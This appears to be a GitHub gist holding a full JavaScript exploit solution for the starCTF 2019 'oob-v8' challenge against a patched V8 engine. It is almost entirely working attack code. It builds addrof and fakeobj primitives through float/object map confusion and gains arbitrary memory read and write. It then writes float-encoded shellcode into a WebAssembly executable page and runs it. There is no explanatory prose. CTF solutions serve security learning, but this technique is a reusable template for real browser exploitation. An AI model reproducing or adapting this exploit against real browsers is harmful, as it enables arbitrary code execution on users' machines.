Created
August 26, 2021 11:08
-
-
Save d4rk-kn1gh7/354b9e35922e8880bec99303c2166dc7 to your computer and use it in GitHub Desktop.
starCTF 2019 - oob-v8
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var tmp_buf = new ArrayBuffer(8) | |
| var f64 = new Float64Array(tmp_buf) | |
| var u32 = new Uint32Array(tmp_buf) | |
| var BASE = 0x100000000 | |
| function f2i(f) { | |
| f64[0] = f | |
| return u32[0] + BASE*u32[1] | |
| } | |
| function i2f(i) { | |
| u32[0] = i % BASE | |
| u32[1] = i / BASE | |
| return f64[0] | |
| } | |
| function hex(x) { | |
| if (x < 0) return `-${hex(-x)}` | |
| return `0x${x.toString(16)}` | |
| } | |
| let obj1 = {a: 0x1234} | |
| let obj2 = {b: 0x5678} | |
| let a = [1.1, 2.2, 3.3, 4.4, 5.5]; | |
| let b = [obj1, obj2]; | |
| let target = [13.37, 2.2, 3.3, 4.4]; | |
| const double_map = a.oob() | |
| print("[*] double map: "+hex(f2i(double_map))) | |
| const obj_map = b.oob() | |
| print("[*] obj map: "+hex(f2i(obj_map))) | |
| function addrof(obj){ | |
| a.oob(obj_map) | |
| a[0] = obj | |
| a.oob(double_map) | |
| return f2i(a[0]) - 1 | |
| } | |
| function fakeobj(addr){ | |
| a.oob(double_map) | |
| if(addr & 1) | |
| a[0] = i2f(addr) | |
| else | |
| a[0] = i2f(addr + 1) | |
| a.oob(obj_map) | |
| return a[0] | |
| } | |
| target[0] = double_map // map | |
| target[2] = i2f(addrof(target) + 1) // elements | |
| let fake = fakeobj(addrof(target) - 0x20) | |
| function read(addr) { | |
| if(addr & 1) | |
| fake[0] = i2f(addr - 0x10) // Account for elements header | |
| else | |
| fake[0] = i2f(addr - 0x10 + 1) | |
| return f2i(target[0]) | |
| } | |
| function write(addr, value) { | |
| if(addr & 1) | |
| fake[0] = i2f(addr - 0x10) | |
| else | |
| fake[0] = i2f(addr - 0x10 + 1) | |
| target[0] = value | |
| } | |
| var target2 = new ArrayBuffer(0x20) | |
| var float_buf = new DataView(target2) | |
| function write_arr(addr, arr) { | |
| write(addrof(target2) + 0x20, i2f(addr)) | |
| for(let i = 0; i < arr.length; i++) | |
| float_buf.setFloat64(8*i, arr[i], true) | |
| } | |
| var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]) | |
| var wasm_mod = new WebAssembly.Module(wasm_code) | |
| var wasm_instance = new WebAssembly.Instance(wasm_mod) | |
| var f = wasm_instance.exports.main | |
| var addr_wasm = addrof(wasm_instance) | |
| print("[*] wasm @ " + hex(addr_wasm)) | |
| var addr_f = addrof(f) | |
| print("[*] f @ " + hex(addr_f)) | |
| var addr_shellcode = read(addr_wasm + 0x88) | |
| print("[*] Shellcode @ " + hex(addr_shellcode)) | |
| let shellcode = [ | |
| 2.825563119134789e-71, 3.2060568105999132e-80, | |
| -2.5309726874116607e+35, 7.034840446283643e-309 | |
| ] | |
| write_arr(addr_shellcode, shellcode) | |
| print("[*] Shellcode write done") | |
| f() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment